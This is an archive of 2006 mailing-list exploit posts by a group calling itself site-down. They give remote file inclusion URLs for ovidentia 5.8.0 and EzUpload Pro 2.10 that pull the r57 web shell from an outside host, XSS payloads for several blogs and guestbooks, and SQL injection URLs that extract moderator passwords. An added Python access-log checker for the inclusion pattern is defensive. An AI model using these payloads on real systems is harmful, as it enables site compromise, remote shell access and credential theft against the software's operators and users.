multiple file inclusion exploits in ovidentia v5.8.0

2006-06-01 Thread black-cod3
multiple file inclusion exploits in ovidentia v5.8.0


forum type : ovidentia v5.8.0

bug found by : black-code&sweet-devil

team : site-down

type : file include 




exploits :



http://www.example.com/orid/index.php?babInstallPath=http://Yoursite.com/r57.txt?


http://www.example.com/orid/ovidentia/topman.php?babInstallPath=http://Yoursite.com/r57.txt?


http://www.example.com/orid/ovidentia/approb.php?babInstallPath=http://Yoursite.com/r57.txt?


http://www.example.com/orid/ovidentia/vacadmb.php?babInstallPath=http://Yoursite.com/r57.txt?


http://www.example.com/orid/ovidentia/vacadma.php?babInstallPath=http://Yoursite.com/r57.txt?


http://www.example.com/orid/ovidentia/vacadm.php?babInstallPath=http://Yoursite.com/r57.txt?


http://www.example.com/orid/ovidentia/statart.php?babInstallPath=http://Yoursite.com/r57.txt?


http://www.example.com/orid/ovidentia/search.php?babInstallPath=http://Yoursite.com/r57.txt?


http://www.example.com/orid/ovidentia/posts.php?babInstallPath=http://Yoursite.com/r57.txt?


http://www.example.com/orid/ovidentia/options.php?babInstallPath=http://Yoursite.com/r57.txt?




And more pages are vulnerable in the directory /ovidentia/ with the same variable,


as an example :


login.php


frchart.php


flbchart.php


fileman.php


faq.php


event.php


directory.php


articles.php


artedit.php


approb.php


calday.php



And more .. ;)









###

emails: 


[EMAIL PROTECTED]  &  [EMAIL PROTECTED]

###



All my respect to our friends , lezr.com , g123g.net 



done .. peace


Xss exploit in Photoalbum B&W v1.3

2006-05-29 Thread black-cod3
Xss exploit in Photoalbum B&W v1.3


forum type : Photoalbum B&W v1.3

bug found by : black-code & sweet-devil

team : site-down

type : Xss




exploit :



http://www.example.com/superalbum/index.php?pic='>alert(10)





path to admin login:


###

emails: 


[EMAIL PROTECTED]  &  [EMAIL PROTECTED]

###



All my respect to our friends , lezr.com , g123g.net 



done .. peace


multiple file include exploits in EzUpload Pro v2.10

2006-05-29 Thread black-cod3
multiple file include exploits in EzUpload Pro v2.10 


forum type : EzUpload Pro v2.10 

bug found by : black-code & sweet-devil

team : site-down

type : file include 




exploits :



form.php


http://www.example.com/path/form.php?path=http://rst.void.ru/download/r57shell.txt?&cmd=pwd


customize.php


http://www.example.com/arab3upload/customize.php?path=http://rst.void.ru/download/r57shell.txt?&cmd=pwd


initialize.php


http://www.example.com/arab3upload/initialize.php?path=http://rst.void.ru/download/r57shell.txt?&cmd=pwd





path to admin login:


###

emails: 


[EMAIL PROTECTED]  &  [EMAIL PROTECTED]

###



All my respect to our friends , lezr.com , g123g.net 



done .. peace
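
Added example, not part of the original posts and not code from either project: a defender-side access-log check for the inclusion pattern reported in the ovidentia and EzUpload Pro posts above. It flags requests whose babInstallPath or path parameter carries a remote URL, including percent-encoded forms. The function names, the host host.invalid and the log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Parameters named in the two advisories above; extend for other applications.
WATCHED_PARAMS = {"babinstallpath", "path"}
# A value that starts with scheme:// (or a protocol-relative //host) is not a
# local include path, so it should never reach these parameters.
REMOTE_VALUE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*:)?//", re.I)
# Client, request target and status from a combined-format access log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def fully_unquote(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %253A) up to `rounds` times."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_rfi_attempts(log_lines):
    """Return (client, script, param, value, status) for suspicious requests."""
    hits = []
    for line in log_lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target, status = m.group(1), m.group(2), int(m.group(3))
        parts = urlsplit(target)
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            value = fully_unquote(value)
            if name.lower() in WATCHED_PARAMS and REMOTE_VALUE.match(value):
                hits.append((client, parts.path, name, value, status))
    return hits

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jun/2006:10:00:01 +0000] "GET /ovidentia/topman.php?babInstallPath=http://host.invalid/x.txt? HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jun/2006:10:00:05 +0000] "GET /upload/form.php?path=http%253A%252F%252Fhost.invalid%252Fx.txt%3F HTTP/1.1" 404 210',
    '198.51.100.4 - - [01/Jun/2006:10:01:00 +0000] "GET /upload/form.php?path=uploads/ HTTP/1.1" 200 900',
    '198.51.100.4 - - [01/Jun/2006:10:01:09 +0000] "GET /ovidentia/index.php?tg=login HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit)
```

A flagged request that returned status 200 is the one to triage first. Access logs do not record POST bodies, so this check covers query strings only.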


sql injection in PHPcafe.net Tutorial Manager

2006-05-27 Thread black-cod3
sql injection in PHPcafe.net Tutorial Manager v1.0 Beta 2 


forum type : PHPcafe.net Tutorial Manager v1.0 Beta 2

bug found by : black-code&sweet-devil

team : site-down

type : Sql injection


code:


http://www.xxx.com/path/index.php?lang=0&CODE=1&id=[sql]



path to admin login:


http://www.xxx.com/pth/admin


All my respect to my friend sweet-devil , lezr.com , g123g.net ..


done .. peace


Multiple Xss exploits in ar-blog v 5.2

2006-05-27 Thread black-cod3
Multiple Xss exploits in ar-blog v 5.2


forum type : ar-blog v 5.2

bug found by : black-code

team : site-down

type : Xss


black-code:


http://www.xxx.com/path/index.php?page=gb&count=next='>alert(10)


http://www.xxx.com/path/index.php?page=gb&count='>alert(10)


http://www.xxx.com/path/index.php?page=showtopis&month=mo&year=Year_the_news='>alert(10)


http://www.xxx.com/path/index.php?page=showtopis&month=mo&year='>alert(10)


http://www.xxx.com/path/index.php?page=showtopis&month=mo='>alert(10)


http://www.xxx.com/path/index.php?page=showtopis&month='>alert(10)




path to admin login:


http://www.xxx.com/pth/admin


All my respect to my friend sweet-devil , lezr.com , g123g.net ..


done .. peace


Xss exploit in Chipmunk guestbook

2006-05-27 Thread black-cod3
Xss exploit in Chipmunk guestbook



forum type : Chipmunk guestbook 

bug found by : black-code

team : site-down

type : Xss


black-code:


codes :


http://www.xxx.com/scambi/index.php?start='>alert(10)




path to admin login:


http://www.xxx.com/path/admin


All my respect to my friend sweet-devil , lezr.com , g123g.net ..


done .. peace


Critical sql injection in saphplesson 2.0

2006-05-27 Thread black-cod3
Critical sql injection in : 


forum type : saphplesson 2.0

bug found by : black-code&sweet-devil

team : site-down

type : sql injection


black-code:


http://www.xxx.net/sh3r/add.php?forumid=-1%20union%20select%20Modpassword%20from%20modretor


sweet-devil:


http://www.xxx.net/lesons/show.php?lessid=1%20union%20select%20null,null,null,ModName,ModPassword,ModPassword,ModPassword%20FROM%20modretor



path to admin login:


http://www.xxx.com/pth/admin


All my respect to my friend sweet-devil , lezr.com , g123g.net ..


done .. peace